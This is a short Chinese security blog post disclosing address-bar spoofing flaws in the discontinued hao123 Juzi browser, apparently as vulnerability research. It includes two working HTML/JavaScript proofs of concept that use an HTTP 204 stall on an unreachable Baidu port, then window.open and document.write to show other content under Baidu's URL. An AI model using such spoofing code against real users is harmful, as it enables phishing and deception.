首页 » 渗透测试 » 正文

[浏览器安全漏洞二] hao123桔子浏览器 – 页面欺骗漏洞

0x00:原理

伪造URL地址漏洞,HTTP204/205地址栏伪造。

页面欺骗漏洞函数:

Window.open()
document.write()

通过一个欺骗漏洞,浏览器跳转到一个新的页面,加载了一个无效地址,处于挂起状态,并且未对无效地址做任何处理。

 

0x01:漏洞

浏览器版本:v2.1.0.1038   (已停止更新了)

1.HTTP204伪造网站漏洞

204 No Content(无内容)—-该响应码有时候表明请求已经执行成功但不需要做任何响应。204响应码会中断浏览器的页面跳转,浏览器会保持原URL不变,页面内容也维持原状。

window.open() 跳转到HTTP 204之后,会更新地址栏,然后通过opener注入

伪造百度,因为成功跳转,需要伪造一个指定无法访问的端口即可。

exp:

<a href="https://www.baidu.com:5555" target="sb" onclick="setTimeout('d()', 1000);">点我</a>
<script>
function d(){
window.open("javascript:location.href='<title>百度搜索</title>www.yuag.org'", "sb");
}
</script>

 

 2.伪造任意网站漏洞

poc:

<html>
<head>
  <title>打开小雨博客</title>
  <script type="text/javascript">
var wx;
function poc() {
  wx = open("http://www.baidu.com:5555","newwin");
  doit();
}
function doit() {
  
  wx.document.write("<ti"+"tle>yuag</title><iframe src='https://www.yuag.org' width=95% height=95%>");
}
poc();
  </script>

 

 

0x03:视频

https://www.bilibili.com/video/av55777222

 

 

0x04:参考

现代浏览器新安全研究.ppt

WEB之困

浏览器地址栏欺骗漏洞挖掘.VSRC.2017.7.29城市沙龙第一站.ppt

现代浏览器地址栏之困.ppt

白帽子讲浏览器安全

Browser UI Security 技术白皮书

 

 

发表评论